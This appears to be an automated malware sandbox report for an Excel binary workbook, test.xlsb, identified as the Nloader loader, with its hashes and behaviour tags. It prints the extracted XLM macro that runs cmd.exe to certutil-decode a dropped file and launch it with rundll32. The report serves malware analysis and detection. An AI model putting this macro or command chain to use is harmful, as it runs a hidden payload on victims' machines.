Resubmissions

  • 15/05/2021, 06:30 UTC: 210515-lxdxev1lpn (score 10)

  • 15/05/2021, 06:01 UTC: 210515-2knl4q95bs (score 10)

General

  • Target

    test.xlsb

  • Size

    254KB

  • Sample

    210515-lxdxev1lpn

  • MD5

    dc37192b5c4c8c4f94c73c18ce5e3829

  • SHA1

    0aa6bb11a11dade2269d90b2781ed0a517362012

  • SHA256

    db53f42e13d2685bd34dbc5c79fad637c9344e72e210ca05504420874e98c2a6

  • SHA512

    3e8b179d8521fb33a46eeeca74bbda7a4e8a32f47b6195b17d62664dd2e31716261a61a495857ed08dbbc001a9eab8adec7133921179eb3df66c53e18c586d9a

Score
10/10

Malware Config

Extracted

  • Language

    xlm4.0

  • Source 1

    =CALL("Kernel32", "WinExec", "CJ", "cmd.exe /c certutil -decode %PUBLIC%\130486.dot %PUBLIC%\130486.pgj && rundll32 %PUBLIC%\130486.pgj,DF1", 0)

Targets

    • Target

      test.xlsb (254KB, score 10/10; hashes as listed under General above)

    • Nloader

      Simple loader that includes the keyword 'campo' in the URL used to download other families.

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Nloader Payload

    • Loads dropped DLL
